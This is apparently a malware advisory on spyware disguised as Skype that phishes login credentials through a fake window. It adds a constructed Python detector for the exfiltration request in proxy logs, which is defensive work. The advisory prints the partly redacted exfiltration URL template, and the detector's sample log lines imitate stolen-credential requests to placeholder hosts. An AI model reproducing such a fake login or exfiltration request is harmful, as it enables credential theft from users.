Description:
To get a one-glance comprehensive view of the behavior of this spyware, refer to the Behavior Diagram shown below.
Spyware Overview
This spyware is installed manually by a user.
It disguises itself as Skype, a popular instant messaging and VoIP application, in an attempt to steal user names and passwords for that program. It even bears the Skype icon to trick users into thinking that it is not a malicious file.
Upon execution, it displays the following message box:
It then displays the following fake Skype login window to trick users into giving out their account credentials:

It also attempts to terminate the legitimate Skype program.
This spyware is capable of monitoring the keystrokes users enter into the user name and password fields. Pressing the Enter key triggers a click action on the Sign In button. Once this button is clicked, it compares the newly entered password to the password previously entered by the user, which it retrieves from the registry. It counts the number of different passwords entered, and on each attempt displays a fake error message indicating that the entered credentials are invalid.
After four login attempts, this spyware terminates itself. It then sends the data it gathers to the IP address XXX.232.{BLOCKED}.42 via HTTP GET. Furthermore, it attempts to execute the legitimate Skype program.
The aforementioned address actually leads to the following site:
http://irkka86.{BLOCKED}.net/index.php?action=post&username=<{different_pass}>{user name}&password={password}&ps=
Where:
- {different_pass} - password count
- {user name} - entered user name of the fake Skype login window
- {password} - entered password of the fake Skype login window
The said routine risks the exposure of the affected user's account information, which may then be used for unauthorized purposes.
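The exfiltration request above has a fixed shape (an HTTP GET to index.php with action=post, username, password and ps parameters, where the username is prefixed by the password count in angle brackets), which makes it a usable detection signature in web proxy logs. The following is an added example, not code from the original page or from the vendor; the log line format, client addresses and the placeholder host name are constructed, and only the query-string layout is taken from the description.

```python
"""Detect the fake-Skype credential exfiltration GET in proxy logs.

Added example, not the vendor's code. The log format
("<timestamp> <client-ip> <method> <url>") and the host name are
constructed placeholders; the query-string shape comes from the description.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Query keys the fake Skype login sends in its HTTP GET (from the description).
REQUIRED_KEYS = {"action", "username", "password", "ps"}

# Constructed sample proxy log lines. The host stands in for the {BLOCKED} domain.
# Line 1: encoded "<2>alice" prefix; line 2: benign request to the same script;
# line 3: a POST, which the spyware does not use; line 4: raw "<4>carol" prefix.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 GET http://irkka86.example.invalid/index.php?action=post&username=%3C2%3Ealice&password=hunter2&ps=
2024-01-01T10:00:02Z 10.0.0.5 GET http://www.example.invalid/index.php?action=view&id=7
2024-01-01T10:00:03Z 10.0.0.9 POST http://login.example.invalid/index.php?action=post&username=bob&password=x&ps=
2024-01-01T10:00:04Z 10.0.0.7 GET http://irkka86.example.invalid/index.php?action=post&username=<4>carol&password=pw&ps=
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")
# The description gives the username value as "<{different_pass}>{user name}".
COUNT_RE = re.compile(r"^<(\d+)>(.*)$")


def parse_line(line):
    """Split one constructed log line into its fields, or return None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def match_exfil(url):
    """Return extracted fields if the URL matches the spyware's GET pattern, else None.

    The password itself is never stored; only its length is reported so the
    detector does not copy the victim's secret into alert data.
    """
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return None
    # keep_blank_values is required: the trailing "ps=" carries an empty value
    # and would otherwise be dropped, hiding the signature.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not REQUIRED_KEYS.issubset(qs) or qs["action"][0] != "post":
        return None
    username = qs["username"][0]
    count = None
    cm = COUNT_RE.match(username)
    if cm:
        count, username = int(cm.group(1)), cm.group(2)
    return {
        "host": parts.hostname,
        "count": count,
        "username": username,
        "password_len": len(qs["password"][0]),
    }


def scan_log(text):
    """Return one alert record per matching GET request in the log text."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "GET":
            continue
        fields = match_exfil(rec["url"])
        if fields:
            hits.append({"ts": rec["ts"], "client": rec["client"], **fields})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Each alert carries the client address, the contacted host, the attempt counter and the user name, which is enough to identify the affected machine and account for credential reset without retaining the captured password.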